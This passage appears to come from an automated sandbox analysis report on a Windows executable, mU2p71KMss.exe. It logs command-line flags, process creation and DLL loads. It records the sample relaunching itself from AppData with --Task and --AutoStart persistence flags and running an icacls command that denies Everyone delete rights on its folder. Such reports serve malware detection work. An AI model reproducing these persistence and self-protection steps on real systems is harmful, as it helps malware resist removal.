          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Admin1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsAutoStart1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsTask1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --ForNetRes1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsAutoStart1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsTask1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Task1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --AutoStart1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Service1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: X1P1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Admin1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: runas1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: x2Q1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: x*P1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: C:\Windows\1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: D:\Windows\1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: 7P1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: %username%1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: F:\1_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Admin5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsAutoStart5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsTask5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --ForNetRes5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsAutoStart5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: IsTask5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Task5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --AutoStart5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Service5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: X1P5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: --Admin5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: runas5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: x2Q5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: x*P5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: C:\Windows\5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: D:\Windows\5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: 7P5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: %username%5_2_00419F90
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCommand line argument: F:\5_2_00419F90
          Source: mU2p71KMss.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\mU2p71KMss.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: mU2p71KMss.exeString found in binary or memory: set-addPolicy
          Source: mU2p71KMss.exeString found in binary or memory: id-cmc-addExtensions
          Source: mU2p71KMss.exeString found in binary or memory: set-addPolicy
          Source: mU2p71KMss.exeString found in binary or memory: id-cmc-addExtensions
          Source: mU2p71KMss.exeString found in binary or memory: set-addPolicy
          Source: mU2p71KMss.exeString found in binary or memory: id-cmc-addExtensions
          Source: mU2p71KMss.exeString found in binary or memory: set-addPolicy
          Source: mU2p71KMss.exeString found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\mU2p71KMss.exeFile read: C:\Users\user\Desktop\mU2p71KMss.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTask
          Source: unknownProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --Task
          Source: unknownProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStart
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe"Jump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeProcess created: C:\Users\user\Desktop\mU2p71KMss.exe "C:\Users\user\Desktop\mU2p71KMss.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe --TaskJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStartJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeProcess created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe" --AutoStartJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: pcacli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
